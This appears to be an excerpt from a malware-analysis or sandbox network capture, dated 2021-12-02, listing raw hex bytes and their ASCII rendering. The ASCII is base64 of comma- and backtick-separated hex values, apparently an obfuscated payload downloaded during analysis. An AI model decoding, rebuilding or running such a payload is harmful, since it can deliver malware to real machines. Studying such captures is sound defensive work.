53 78 67 52 6b 4d 73 59 44 4e 45 4c 47 42 47 52 53 78 67 52 54 55 73 59 45 4a 47 4c 47 42 44 4e 79 78 67 4e 44 63 73 59 45 45 77 4c 47 41 78 51 69 78
                                      Data Ascii: MTUsYDRCLGA2RixgRUYsYEIyLGA3RixgRTYsYENGLGAwMixgMUUsYEZGLGA3MyxgN0UsYEYyLGBENyxgNzQsYDM0LGBDRixgNUYsYDhFLGA3NyxgM0EsYDlBLGBFNyxgQkYsYEM0LGA2NyxgN0QsYENELGBGMyxgMEMsYDA4LGA1QyxgRkQsYEQyLGBGRixgNzgsYDlFLGAzRSxgRkMsYDNELGBGRSxgRTUsYEJGLGBDNyxgNDcsYEEwLGAxQix
                                      2021-12-02 17:36:08 UTC463INData Raw: 51 54 63 73 59 45 56 47 4c 47 41 7a 52 69 78 67 4d 44 59 73 59 44 4e 45 4c 47 42 47 51 79 78 67 4d 6a 55 73 59 44 64 47 4c 47 42 44 51 79 78 67 52 45 59 73 59 45 59 7a 4c 47 41 7a 4d 43 78 67 52 6b 51 73 59 44 52 47 4c 47 42 47 52 53 78 67 51 30 59 73 59 45 5a 45 4c 47 42 46 52 69 78 67 52 6b 49 73 59 44 4e 45 4c 47 41 77 51 79 78 67 4d 6a 59 73 59 44 4e 47 4c 47 42 42 52 53 78 67 4d 30 49 73 59 44 49 77 4c 47 41 7a 52 53 78 67 4d 44 63 73 59 44 67 34 4c 47 42 43 52 69 78 67 52 55 45 73 59 44 63 33 4c 47 41 33 51 69 78 67 52 6a 6b 73 59 44 42 43 4c 47 42 45 4d 69 78 67 4e 30 59 73 59 45 59 7a 4c 47 42 47 52 69 78 67 52 6b 55 73 59 45 49 7a 4c 47 42 43 51 79 78 67 51 55 4d 73 59 44 6c 46 4c 47 41 78 52 69 78 67 4f 54 55 73 59 45 5a 45 4c 47 42 44 4f 53 78
                                      Data Ascii: QTcsYEVGLGAzRixgMDYsYDNELGBGQyxgMjUsYDdGLGBDQyxgREYsYEYzLGAzMCxgRkQsYDRGLGBGRSxgQ0YsYEZELGBFRixgRkIsYDNELGAwQyxgMjYsYDNGLGBBRSxgM0IsYDIwLGAzRSxgMDcsYDg4LGBCRixgRUEsYDc3LGA3QixgRjksYDBCLGBEMixgN0YsYEYzLGBGRixgRkUsYEIzLGBCQyxgQUMsYDlFLGAxRixgOTUsYEZELGBDOSx
                                      2021-12-02 17:36:08 UTC479INData Raw: 51 54 4d 73 59 45 49 7a 4c 47 42 46 52 43 78 67 52 45 45 73 59 44 64 47 4c 47 42 46 52 69 78 67 4d 45 59 73 59 44 51 35 4c 47 42 47 52 69 78 67 51 6a 45 73 59 45 59 30 4c 47 41 31 4e 79 78 67 52 6b 59 73 59 45 52 47 4c 47 42 46 4e 43 78 67 4d 54 63 73 59 45 56 45 4c 47 42 47 52 53 78 67 52 54 59 73 59 44 64 47 4c 47 42 44 4f 43 78 67 4e 45 59 73 59 45 51 31 4c 47 41 31 52 69 78 67 4e 7a 51 73 59 45 52 46 4c 47 42 47 51 69 78 67 4e 44 4d 73 59 45 59 78 4c 47 42 45 52 53 78 67 4d 6a 63 73 59 45 52 47 4c 47 42 47 51 53 78 67 4e 6b 59 73 59 44 4e 46 4c 47 41 30 52 69 78 67 4d 55 59 73 59 45 5a 47 4c 47 41 31 4d 79 78 67 52 6b 59 73 59 44 63 79 4c 47 41 78 4d 43 78 67 4e 6a 51 73 59 44 6b 30 4c 47 42 46 4f 53 78 67 51 7a 6b 73 59 44 4e 47 4c 47 42 47 52 69 78
                                      Data Ascii: QTMsYEIzLGBFRCxgREEsYDdGLGBFRixgMEYsYDQ5LGBGRixgQjEsYEY0LGA1NyxgRkYsYERGLGBFNCxgMTcsYEVELGBGRSxgRTYsYDdGLGBDOCxgNEYsYEQ1LGA1RixgNzQsYERFLGBGQixgNDMsYEYxLGBERSxgMjcsYERGLGBGQSxgNkYsYDNFLGA0RixgMUYsYEZGLGA1MyxgRkYsYDcyLGAxMCxgNjQsYDk0LGBFOSxgQzksYDNGLGBGRix
                                      2021-12-02 17:36:08 UTC495INData Raw: 52 6a 63 73 59 45 5a 46 4c 47 41 7a 4d 43 78 67 51 6b 4d 73 59 45 59 33 4c 47 41 78 4e 79 78 67 52 6b 51 73 59 44 4d 31 4c 47 41 79 52 69 78 67 52 45 59 73 59 45 45 32 4c 47 41 79 4e 79 78 67 52 6b 59 73 59 45 4e 46 4c 47 42 43 52 69 78 67 4f 54 49 73 59 45 5a 43 4c 47 42 46 52 69 78 67 4e 30 51 73 59 44 6c 42 4c 47 42 47 52 53 78 67 52 54 6b 73 59 45 4a 47 4c 47 41 7a 4d 79 78 67 4f 44 6b 73 59 45 4d 77 4c 47 41 35 4f 43 78 67 52 45 55 73 59 45 5a 43 4c 47 41 35 4e 43 78 67 4e 6b 4d 73 59 44 51 7a 4c 47 42 46 4e 79 78 67 51 6b 51 73 59 45 55 33 4c 47 41 33 4f 43 78 67 52 55 59 73 59 44 4d 33 4c 47 42 47 51 79 78 67 52 55 51 73 59 45 5a 46 4c 47 42 47 4e 53 78 67 4e 30 59 73 59 44 4d 30 4c 47 42 47 52 43 78 67 51 6a 55 73 59 44 6c 47 4c 47 42 47 51 79 78
                                      Data Ascii: RjcsYEZFLGAzMCxgQkMsYEY3LGAxNyxgRkQsYDM1LGAyRixgREYsYEE2LGAyNyxgRkYsYENFLGBCRixgOTIsYEZCLGBFRixgN0QsYDlBLGBGRSxgRTksYEJGLGAzMyxgODksYEMwLGA5OCxgREUsYEZCLGA5NCxgNkMsYDQzLGBFNyxgQkQsYEU3LGA3OCxgRUYsYDM3LGBGQyxgRUQsYEZFLGBGNSxgN0YsYDM0LGBGRCxgQjUsYDlGLGBGQyx
                                      2021-12-02 17:36:08 UTC511INData Raw: 52 6b 55 73 59 44 6b 7a 4c 47 42 47 52 69 78 67 52 54 67 73 59 45 4a 47 4c 47 42 46 51 69 78 67 51 6b 59 73 59 44 63 32 4c 47 42 47 4d 69 78 67 4d 6b 59 73 59 45 4e 45 4c 47 41 34 4d 43 78 67 51 30 51 73 59 45 46 47 4c 47 42 46 4d 79 78 67 4e 6a 45 73 59 45 59 7a 4c 47 41 34 4d 79 78 67 52 45 59 73 59 44 4d 32 4c 47 42 43 4e 43 78 67 52 44 55 73 59 44 55 7a 4c 47 42 44 4d 53 78 67 52 54 59 73 59 45 55 30 4c 47 42 42 4e 79 78 67 52 55 45 73 59 44 4e 47 4c 47 42 43 4d 69 78 67 4d 44 4d 73 59 45 59 32 4c 47 41 79 52 69 78 67 4d 44 45 73 59 45 51 34 4c 47 42 47 52 69 78 67 52 6b 49 73 59 45 4e 47 4c 47 42 47 51 69 78 67 4f 45 49 73 59 44 63 33 4c 47 42 45 4d 79 78 67 4d 55 59 73 59 45 5a 43 4c 47 42 45 4e 69 78 67 4d 55 59 73 59 44 63 7a 4c 47 42 45 4e 79 78
                                      Data Ascii: RkUsYDkzLGBGRixgRTgsYEJGLGBFQixgQkYsYDc2LGBGMixgMkYsYENELGA4MCxgQ0QsYEFGLGBFMyxgNjEsYEYzLGA4MyxgREYsYDM2LGBCNCxgRDUsYDUzLGBDMSxgRTYsYEU0LGBBNyxgRUEsYDNGLGBCMixgMDMsYEY2LGAyRixgMDEsYEQ4LGBGRixgRkIsYENGLGBGQixgOEIsYDc3LGBEMyxgMUYsYEZCLGBENixgMUYsYDczLGBENyx
                                      2021-12-02 17:36:08 UTC527INData Raw: 4e 7a 63 73 59 44 63 32 4c 47 42 45 52 53 78 67 52 6b 49 73 59 44 67 31 4c 47 41 33 4f 43 78 67 52 55 59 73 59 45 56 44 4c 47 41 78 52 69 78 67 52 6b 4d 73 59 45 4d 33 4c 47 42 47 52 69 78 67 51 30 45 73 59 45 59 30 4c 47 41 77 52 69 78 67 52 6a 67 73 59 44 56 45 4c 47 42 43 4e 69 78 67 52 6b 55 73 59 44 51 33 4c 47 42 47 52 69 78 67 51 6b 51 73 59 44 6c 47 4c 47 42 47 4f 53 78 67 4f 54 63 73 59 44 64 46 4c 47 41 32 4f 53 78 67 4d 7a 63 73 59 45 56 45 4c 47 41 7a 4e 79 78 67 52 6b 59 73 59 45 49 78 4c 47 42 42 4f 43 78 67 51 55 49 73 59 45 5a 43 4c 47 41 7a 4d 79 78 67 4f 54 51 73 59 44 45 77 4c 47 42 46 51 69 78 67 4f 44 41 73 59 45 5a 45 4c 47 41 78 4e 79 78 67 4f 54 45 73 59 45 51 30 4c 47 42 47 4f 43 78 67 51 30 49 73 59 45 5a 46 4c 47 42 44 51 53 78
                                      Data Ascii: NzcsYDc2LGBERSxgRkIsYDg1LGA3OCxgRUYsYEVDLGAxRixgRkMsYEM3LGBGRixgQ0EsYEY0LGAwRixgRjgsYDVELGBCNixgRkUsYDQ3LGBGRixgQkQsYDlGLGBGOSxgOTcsYDdFLGA2OSxgMzcsYEVELGAzNyxgRkYsYEIxLGBBOCxgQUIsYEZCLGAzMyxgOTQsYDEwLGBFQixgODAsYEZELGAxNyxgOTEsYEQ0LGBGOCxgQ0IsYEZFLGBDQSx
                                      2021-12-02 17:36:08 UTC543INData Raw: 4e 55 59 73 59 44 46 43 4c 47 42 44 4e 69 78 67 4d 55 51 73 59 44 68 42 4c 47 41 77 52 53 78 67 51 55 51 73 59 44 55 78 4c 47 41 78 4e 53 78 67 4d 55 51 73 59 45 49 77 4c 47 42 43 51 69 78 67 4d 44 41 73 59 45 5a 43 4c 47 41 34 51 69 78 67 4e 30 55 73 59 45 4a 47 4c 47 42 47 51 79 78 67 51 30 59 73 59 44 51 35 4c 47 42 47 4e 79 78 67 52 6b 59 73 59 45 52 45 4c 47 42 47 52 69 78 67 52 6b 4d 73 59 44 41 33 4c 47 41 7a 52 53 78 67 52 44 67 73 59 45 52 47 4c 47 41 79 4d 79 78 67 52 6b 51 73 59 45 4e 43 4c 47 42 47 52 53 78 67 4d 54 49 73 59 45 49 33 4c 47 41 34 4d 69 78 67 52 6a 63 73 59 44 41 33 4c 47 41 33 4e 79 78 67 52 45 55 73 59 45 5a 43 4c 47 41 31 4e 53 78 67 4e 54 67 73 59 44 4d 79 4c 47 42 47 51 69 78 67 4d 54 4d 73 59 45 49 32 4c 47 42 47 52 69 78
                                      Data Ascii: NUYsYDFCLGBDNixgMUQsYDhBLGAwRSxgQUQsYDUxLGAxNSxgMUQsYEIwLGBCQixgMDAsYEZCLGA4QixgN0UsYEJGLGBGQyxgQ0YsYDQ5LGBGNyxgRkYsYERELGBGRixgRkMsYDA3LGAzRSxgRDgsYERGLGAyMyxgRkQsYENCLGBGRSxgMTIsYEI3LGA4MixgRjcsYDA3LGA3NyxgREUsYEZCLGA1NSxgNTgsYDMyLGBGQixgMTMsYEI2LGBGRix
                                      2021-12-02 17:36:08 UTC559INData Raw: 4f 54 6b 73 59 44 64 46 4c 47 42 42 52 43 78 67 4e 55 59 73 59 44 68 44 4c 47 42 42 4d 53 78 67 52 6a 41 73 59 44 4e 42 4c 47 42 46 4e 53 78 67 4e 55 59 73 59 45 51 35 4c 47 41 78 4f 53 78 67 51 30 45 73 59 45 56 47 4c 47 41 34 4e 53 78 67 4e 7a 55 73 59 45 4e 42 4c 47 42 43 52 69 78 67 4d 7a 63 73 59 45 59 34 4c 47 41 35 4d 43 78 67 52 44 59 73 59 44 49 35 4c 47 42 47 52 69 78 67 4f 55 45 73 59 44 4e 47 4c 47 42 47 4e 69 78 67 51 55 59 73 59 45 5a 44 4c 47 42 42 52 43 78 67 4d 30 45 73 59 45 56 43 4c 47 41 35 4e 43 78 67 4d 55 59 73 59 45 51 35 4c 47 41 33 4e 53 78 67 51 30 45 73 59 45 52 47 4c 47 42 47 4f 43 78 67 52 44 63 73 59 45 59 34 4c 47 42 45 52 43 78 67 4e 44 49 73 59 44 64 46 4c 47 42 45 51 79 78 67 52 6b 45 73 59 45 55 30 4c 47 41 7a 52 69 78
                                      Data Ascii: OTksYDdFLGBBRCxgNUYsYDhDLGBBMSxgRjAsYDNBLGBFNSxgNUYsYEQ5LGAxOSxgQ0EsYEVGLGA4NSxgNzUsYENBLGBCRixgMzcsYEY4LGA5MCxgRDYsYDI5LGBGRixgOUEsYDNGLGBGNixgQUYsYEZDLGBBRCxgM0EsYEVCLGA5NCxgMUYsYEQ5LGA3NSxgQ0EsYERGLGBGOCxgRDcsYEY4LGBERCxgNDIsYDdFLGBEQyxgRkEsYEU0LGAzRix
                                      2021-12-02 17:36:08 UTC575INData Raw: 4e 44 63 73 59 44 4d 31 4c 47 41 32 52 43 78 67 52 6b 55 73 59 45 45 30 4c 47 42 46 52 69 78 67 52 6b 59 73 59 45 49 33 4c 47 41 32 4f 53 78 67 52 6a 55 73 59 44 4d 33 4c 47 41 31 4e 69 78 67 51 55 49 73 59 44 5a 44 4c 47 41 35 4d 79 78 67 4e 30 55 73 59 44 6b 35 4c 47 41 79 51 53 78 67 52 6b 59 73 59 45 55 77 4c 47 42 47 4e 79 78 67 4e 30 59 73 59 44 6b 30 4c 47 42 47 52 53 78 67 52 6b 59 73 59 44 68 43 4c 47 42 46 4d 53 78 67 51 6b 51 73 59 45 5a 44 4c 47 41 77 4d 79 78 67 52 54 41 73 59 45 45 31 4c 47 42 47 52 69 78 67 52 54 59 73 59 45 46 47 4c 47 42 47 4f 43 78 67 4d 30 59 73 59 44 64 46 4c 47 41 34 52 43 78 67 52 6a 51 73 59 44 68 47 4c 47 42 47 51 79 78 67 4f 54 6b 73 59 44 59 33 4c 47 41 78 52 69 78 67 52 6a 63 73 59 44 63 34 4c 47 42 46 4f 53 78
                                      Data Ascii: NDcsYDM1LGA2RCxgRkUsYEE0LGBFRixgRkYsYEI3LGA2OSxgRjUsYDM3LGA1NixgQUIsYDZDLGA5MyxgN0UsYDk5LGAyQSxgRkYsYEUwLGBGNyxgN0YsYDk0LGBGRSxgRkYsYDhCLGBFMSxgQkQsYEZDLGAwMyxgRTAsYEE1LGBGRixgRTYsYEFGLGBGOCxgM0YsYDdFLGA4RCxgRjQsYDhGLGBGQyxgOTksYDY3LGAxRixgRjcsYDc4LGBFOSx
                                      2021-12-02 17:36:08 UTC591INData Raw: 4e 44 67 73 59 44 46 43 4c 47 41 34 4f 53 78 67 52 6a 6b 73 59 44 5a 47 4c 47 41 7a 51 69 78 67 4e 7a 67 73 59 44 52 47 4c 47 41 7a 52 43 78 67 51 6b 4d 73 59 44 64 47 4c 47 42 43 52 43 78 67 4e 55 59 73 59 44 55 7a 4c 47 42 47 4d 53 78 67 4d 30 55 73 59 45 52 46 4c 47 41 77 4e 69 78 67 52 45 55 73 59 45 4a 47 4c 47 42 44 4e 69 78 67 51 55 59 73 59 45 5a 44 4c 47 41 33 51 69 78 67 4e 45 59 73 59 45 4d 34 4c 47 42 45 4e 79 78 67 4e 30 51 73 59 45 59 34 4c 47 42 45 52 69 78 67 52 6b 59 73 59 45 52 42 4c 47 41 33 52 69 78 67 4e 45 55 73 59 45 5a 42 4c 47 41 32 52 69 78 67 52 6b 55 73 59 44 49 33 4c 47 41 31 52 69 78 67 52 6b 55 73 59 44 4d 7a 4c 47 42 43 4e 43 78 67 4e 54 51 73 59 44 63 31 4c 47 42 47 4d 43 78 67 4e 45 49 73 59 45 5a 46 4c 47 41 35 4d 53 78
                                      Data Ascii: NDgsYDFCLGA4OSxgRjksYDZGLGAzQixgNzgsYDRGLGAzRCxgQkMsYDdGLGBCRCxgNUYsYDUzLGBGMSxgM0UsYERFLGAwNixgREUsYEJGLGBDNixgQUYsYEZDLGA3QixgNEYsYEM4LGBENyxgN0QsYEY4LGBERixgRkYsYERBLGA3RixgNEUsYEZBLGA2RixgRkUsYDI3LGA1RixgRkUsYDMzLGBCNCxgNTQsYDc1LGBGMCxgNEIsYEZFLGA5MSx
                                      2021-12-02 17:36:08 UTC607INData Raw: 4d 44 63 73 59 45 5a 47 4c 47 42 47 4f 53 78 67 4e 55 49 73 59 45 4a 47 4c 47 42 46 4d 69 78 67 52 6a 63 73 59 44 51 35 4c 47 42 43 52 69 78 67 52 6a 63 73 59 45 4d 33 4c 47 42 47 52 53 78 67 4d 30 49 73 59 44 64 47 4c 47 41 31 51 79 78 67 52 6b 45 73 59 44 59 33 4c 47 42 47 52 69 78 67 52 6a 55 73 59 45 4a 47 4c 47 42 45 4d 53 78 67 52 6b 59 73 59 44 51 35 4c 47 41 78 4f 53 78 67 51 7a 6b 73 59 45 52 47 4c 47 42 47 4d 53 78 67 4e 6b 59 73 59 45 59 34 4c 47 42 45 52 69 78 67 4f 55 59 73 59 45 5a 46 4c 47 41 31 4e 43 78 67 52 6b 45 73 59 44 51 33 4c 47 42 47 52 53 78 67 4e 45 49 73 59 45 5a 47 4c 47 42 46 4d 69 78 67 4f 55 59 73 59 44 6b 32 4c 47 42 47 52 53 78 67 52 55 45 73 59 44 4e 47 4c 47 42 47 52 53 78 67 51 6a 63 73 59 45 59 35 4c 47 41 33 52 53 78
                                      Data Ascii: MDcsYEZGLGBGOSxgNUIsYEJGLGBFMixgRjcsYDQ5LGBCRixgRjcsYEM3LGBGRSxgM0IsYDdGLGA1QyxgRkEsYDY3LGBGRixgRjUsYEJGLGBEMSxgRkYsYDQ5LGAxOSxgQzksYERGLGBGMSxgNkYsYEY4LGBERixgOUYsYEZFLGA1NCxgRkEsYDQ3LGBGRSxgNEIsYEZGLGBFMixgOUYsYDk2LGBGRSxgRUEsYDNGLGBGRSxgQjcsYEY5LGA3RSx
                                      2021-12-02 17:36:08 UTC623INData Raw: 4e 30 59 73 59 45 56 43 4c 47 41 7a 4e 79 78 67 52 6a 6b 73 59 45 5a 45 4c 47 42 47 52 53 78 67 52 55 59 73 59 44 6c 47 4c 47 41 30 51 53 78 67 52 6b 59 73 59 45 46 43 4c 47 42 43 52 69 78 67 52 55 59 73 59 44 42 47 4c 47 42 47 52 53 78 67 4d 45 59 73 59 44 67 34 4c 47 42 45 52 69 78 67 52 6b 55 73 59 45 4d 32 4c 47 42 42 4e 79 78 67 52 6b 59 73 59 45 4d 78 4c 47 41 34 51 79 78 67 51 7a 59 73 59 45 59 31 4c 47 41 7a 51 69 78 67 52 6b 55 73 59 44 4a 47 4c 47 41 33 52 69 78 67 4e 30 51 73 59 44 6c 46 4c 47 42 47 52 53 78 67 52 55 55 73 59 45 4a 47 4c 47 42 44 4e 69 78 67 4d 30 59 73 59 45 49 77 4c 47 41 79 4d 43 78 67 52 6a 63 73 59 45 56 44 4c 47 42 47 4e 79 78 67 51 54 45 73 59 44 59 31 4c 47 42 45 51 69 78 67 4e 55 49 73 59 45 5a 43 4c 47 42 44 4f 43 78
                                      Data Ascii: N0YsYEVCLGAzNyxgRjksYEZELGBGRSxgRUYsYDlGLGA0QSxgRkYsYEFCLGBCRixgRUYsYDBGLGBGRSxgMEYsYDg4LGBERixgRkUsYEM2LGBBNyxgRkYsYEMxLGA4QyxgQzYsYEY1LGAzQixgRkUsYDJGLGA3RixgN0QsYDlFLGBGRSxgRUUsYEJGLGBDNixgM0YsYEIwLGAyMCxgRjcsYEVDLGBGNyxgQTEsYDY1LGBEQixgNUIsYEZCLGBDOCx
                                      2021-12-02 17:36:08 UTC639INData Raw: 52 54 6b 73 59 45 52 47 4c 47 42 47 52 69 78 67 52 54 41 73 59 45 59 30 4c 47 42 47 4e 79 78 67 51 54 59 73 59 44 64 47 4c 47 42 46 4e 79 78 67 51 30 59 73 59 44 4a 46 4c 47 42 46 4f 43 78 67 52 45 59 73 59 45 5a 47 4c 47 42 46 4e 43 78 67 52 6b 55 73 59 44 45 31 4c 47 42 47 52 43 78 67 52 6b 49 73 59 44 52 47 4c 47 42 47 52 69 78 67 4d 55 45 73 59 44 64 47 4c 47 41 79 4e 43 78 67 52 6b 51 73 59 44 6c 43 4c 47 41 35 51 79 78 67 52 6b 55 73 59 44 6b 35 4c 47 42 43 52 69 78 67 52 44 45 73 59 44 68 47 4c 47 42 47 52 69 78 67 4d 55 45 73 59 45 5a 47 4c 47 42 45 4f 43 78 67 4e 55 51 73 59 44 63 77 4c 47 42 46 52 69 78 67 52 6b 59 73 59 45 5a 46 4c 47 42 45 51 69 78 67 4f 44 49 73 59 44 49 32 4c 47 42 43 52 69 78 67 51 30 55 73 59 45 51 7a 4c 47 42 43 52 69 78
                                      Data Ascii: RTksYERGLGBGRixgRTAsYEY0LGBGNyxgQTYsYDdGLGBFNyxgQ0YsYDJFLGBFOCxgREYsYEZGLGBFNCxgRkUsYDE1LGBGRCxgRkIsYDRGLGBGRixgMUEsYDdGLGAyNCxgRkQsYDlCLGA5QyxgRkUsYDk5LGBCRixgRDEsYDhGLGBGRixgMUEsYEZGLGBEOCxgNUQsYDcwLGBFRixgRkYsYEZFLGBEQixgODIsYDI2LGBCRixgQ0UsYEQzLGBCRix
                                      2021-12-02 17:36:08 UTC655INData Raw: 52 6a 45 73 59 45 56 47 4c 47 42 47 4e 43 78 67 51 6b 49 73 59 44 6b 79 4c 47 41 35 4e 79 78 67 52 6b 59 73 59 45 5a 43 4c 47 42 45 4d 79 78 67 4e 7a 67 73 59 44 64 47 4c 47 41 7a 4d 79 78 67 4e 55 45 73 59 44 49 33 4c 47 42 47 52 53 78 67 51 55 49 73 59 45 55 35 4c 47 41 78 4d 79 78 67 52 6b 4d 73 59 44 68 46 4c 47 42 45 52 53 78 67 4e 30 59 73 59 44 52 45 4c 47 42 46 52 53 78 67 52 6b 51 73 59 44 52 47 4c 47 42 42 4e 69 78 67 51 30 59 73 59 45 5a 47 4c 47 42 42 4d 79 78 67 52 45 59 73 59 45 59 31 4c 47 42 44 4e 79 78 67 4e 30 55 73 59 44 68 45 4c 47 41 7a 52 69 78 67 52 54 6b 73 59 45 59 33 4c 47 42 47 4f 43 78 67 4f 54 63 73 59 44 64 46 4c 47 42 47 4d 79 78 67 4e 30 59 73 59 45 59 35 4c 47 42 45 4e 79 78 67 52 6b 4d 73 59 45 4d 33 4c 47 41 78 52 69 78
                                      Data Ascii: RjEsYEVGLGBGNCxgQkIsYDkyLGA5NyxgRkYsYEZCLGBEMyxgNzgsYDdGLGAzMyxgNUEsYDI3LGBGRSxgQUIsYEU5LGAxMyxgRkMsYDhFLGBERSxgN0YsYDRELGBFRSxgRkQsYDRGLGBBNixgQ0YsYEZGLGBBMyxgREYsYEY1LGBDNyxgN0UsYDhELGAzRixgRTksYEY3LGBGOCxgOTcsYDdFLGBGMyxgN0YsYEY5LGBENyxgRkMsYEM3LGAxRix
                                      2021-12-02 17:36:08 UTC671INData Raw: 51 6b 59 73 59 45 51 35 4c 47 42 42 52 69 78 67 52 6a 45 73 59 45 55 77 4c 47 41 78 52 69 78 67 52 6a 6b 73 59 45 51 7a 4c 47 42 47 52 69 78 67 4f 54 45 73 59 44 4e 47 4c 47 42 47 52 53 78 67 4d 55 59 73 59 45 5a 45 4c 47 41 34 4d 79 78 67 4e 30 59 73 59 45 49 7a 4c 47 41 31 52 69 78 67 52 54 4d 73 59 45 4d 33 4c 47 42 47 52 53 78 67 4f 54 45 73 59 44 4e 47 4c 47 42 47 4e 53 78 67 4d 55 59 73 59 45 5a 45 4c 47 42 45 4d 79 78 67 4d 55 59 73 59 45 5a 45 4c 47 41 78 4e 69 78 67 51 6b 59 73 59 45 4d 32 4c 47 42 46 4e 79 78 67 52 6b 59 73 59 45 55 34 4c 47 42 45 52 69 78 67 52 6a 49 73 59 45 55 7a 4c 47 42 45 52 69 78 67 52 6b 45 73 59 45 46 45 4c 47 41 33 52 53 78 67 4f 45 51 73 59 44 64 47 4c 47 42 47 4e 43 78 67 51 30 59 73 59 45 5a 46 4c 47 41 32 52 43 78
                                      Data Ascii: QkYsYEQ5LGBBRixgRjEsYEUwLGAxRixgRjksYEQzLGBGRixgOTEsYDNGLGBGRSxgMUYsYEZELGA4MyxgN0YsYEIzLGA1RixgRTMsYEM3LGBGRSxgOTEsYDNGLGBGNSxgMUYsYEZELGBEMyxgMUYsYEZELGAxNixgQkYsYEM2LGBFNyxgRkYsYEU4LGBERixgRjIsYEUzLGBERixgRkEsYEFELGA3RSxgOEQsYDdGLGBGNCxgQ0YsYEZFLGA2RCx
                                      2021-12-02 17:36:08 UTC687INData Raw: 51 6b 51 73 59 44 59 33 4c 47 42 42 4e 43 78 67 4d 30 4d 73 59 44 41 77 4c 47 42 46 4e 53 78 67 51 7a 45 73 59 45 5a 45 4c 47 41 35 4d 79 78 67 4f 44 4d 73 59 44 49 33 4c 47 41 35 52 69 78 67 4e 44 49 73 59 44 51 31 4c 47 41 31 4d 79 78 67 52 6b 45 73 59 45 56 45 4c 47 42 46 4d 43 78 67 52 44 6b 73 59 44 5a 45 4c 47 41 31 4e 43 78 67 52 44 41 73 59 44 67 7a 4c 47 41 35 52 43 78 67 4e 45 59 73 59 45 59 33 4c 47 42 46 52 53 78 67 4d 6a 4d 73 59 45 4e 42 4c 47 41 7a 52 53 78 67 51 6b 51 73 59 44 52 47 4c 47 41 30 51 53 78 67 52 6a 6b 73 59 44 6b 30 4c 47 42 46 4e 79 78 67 52 54 67 73 59 44 41 35 4c 47 41 79 4e 53 78 67 52 45 51 73 59 44 6b 77 4c 47 42 44 52 43 78 67 4d 6a 45 73 59 44 55 31 4c 47 42 47 4f 53 78 67 4e 7a 41 73 59 45 56 47 4c 47 41 31 4e 69 78
                                      Data Ascii: QkQsYDY3LGBBNCxgM0MsYDAwLGBFNSxgQzEsYEZELGA5MyxgODMsYDI3LGA5RixgNDIsYDQ1LGA1MyxgRkEsYEVELGBFMCxgRDksYDZELGA1NCxgRDAsYDgzLGA5RCxgNEYsYEY3LGBFRSxgMjMsYENBLGAzRSxgQkQsYDRGLGA0QSxgRjksYDk0LGBFNyxgRTgsYDA5LGAyNSxgREQsYDkwLGBDRCxgMjEsYDU1LGBGOSxgNzAsYEVGLGA1Nix
                                      2021-12-02 17:36:08 UTC703INData Raw: 4d 54 41 73 59 44 41 78 4c 47 41 77 51 53 78 67 51 7a 55 73 59 45 51 77 4c 47 41 79 4e 79 78 67 4e 45 59 73 59 44 6b 78 4c 47 41 34 4d 53 78 67 52 45 4d 73 59 45 45 31 4c 47 41 32 4d 43 78 67 4e 6a 55 73 59 44 63 33 4c 47 42 47 52 69 78 67 4d 7a 59 73 59 44 63 35 4c 47 41 34 4e 69 78 67 52 6b 49 73 59 44 52 47 4c 47 41 35 52 69 78 67 4d 30 51 73 59 45 49 34 4c 47 42 47 4e 79 78 67 52 54 41 73 59 45 4d 78 4c 47 42 47 4e 79 78 67 4e 44 6b 73 59 44 42 45 4c 47 42 46 51 79 78 67 4f 54 4d 73 59 44 6b 78 4c 47 41 77 4e 79 78 67 4f 54 51 73 59 44 67 33 4c 47 41 35 52 69 78 67 52 44 49 73 59 44 52 42 4c 47 42 45 52 43 78 67 4d 44 4d 73 59 45 4e 46 4c 47 41 78 4d 43 78 67 4f 55 4d 73 59 45 52 46 4c 47 42 45 52 69 78 67 51 6b 51 73 59 44 45 31 4c 47 41 31 52 43 78
                                      Data Ascii: MTAsYDAxLGAwQSxgQzUsYEQwLGAyNyxgNEYsYDkxLGA4MSxgREMsYEE1LGA2MCxgNjUsYDc3LGBGRixgMzYsYDc5LGA4NixgRkIsYDRGLGA5RixgM0QsYEI4LGBGNyxgRTAsYEMxLGBGNyxgNDksYDBELGBFQyxgOTMsYDkxLGAwNyxgOTQsYDg3LGA5RixgRDIsYDRBLGBERCxgMDMsYENFLGAxMCxgOUMsYERFLGBERixgQkQsYDE1LGA1RCx
                                      2021-12-02 17:36:08 UTC719INData Raw: 4f 55 49 73 59 44 45 78 4c 47 41 35 4d 79 78 67 52 6b 55 73 59 44 52 45 4c 47 42 43 52 69 78 67 51 7a 59 73 59 44 4e 47 4c 47 42 47 51 53 78 67 4e 6a 63 73 59 45 5a 46 4c 47 41 35 51 53 78 67 51 6b 59 73 59 45 55 31 4c 47 42 45 4e 69 78 67 4d 30 59 73 59 45 5a 42 4c 47 41 7a 4e 79 78 67 52 6b 51 73 59 44 46 42 4c 47 42 47 52 69 78 67 51 7a 67 73 59 45 52 47 4c 47 42 47 52 69 78 67 52 6b 4d 73 59 45 59 33 4c 47 41 33 4f 53 78 67 4e 45 4d 73 59 44 4e 47 4c 47 41 34 4f 53 78 67 4e 44 55 73 59 45 5a 46 4c 47 41 7a 4f 43 78 67 52 54 49 73 59 45 5a 47 4c 47 41 7a 52 69 78 67 4f 45 51 73 59 44 64 46 4c 47 42 47 52 43 78 67 52 55 51 73 59 44 64 46 4c 47 42 46 51 69 78 67 4e 30 59 73 59 45 55 30 4c 47 41 30 52 69 78 67 51 54 41 73 59 45 55 78 4c 47 42 47 52 43 78
                                      Data Ascii: OUIsYDExLGA5MyxgRkUsYDRELGBCRixgQzYsYDNGLGBGQSxgNjcsYEZFLGA5QSxgQkYsYEU1LGBENixgM0YsYEZBLGAzNyxgRkQsYDFBLGBGRixgQzgsYERGLGBGRixgRkMsYEY3LGA3OSxgNEMsYDNGLGA4OSxgNDUsYEZFLGAzOCxgRTIsYEZGLGAzRixgOEQsYDdFLGBGRCxgRUQsYDdFLGBFQixgN0YsYEU0LGA0RixgQTAsYEUxLGBGRCx
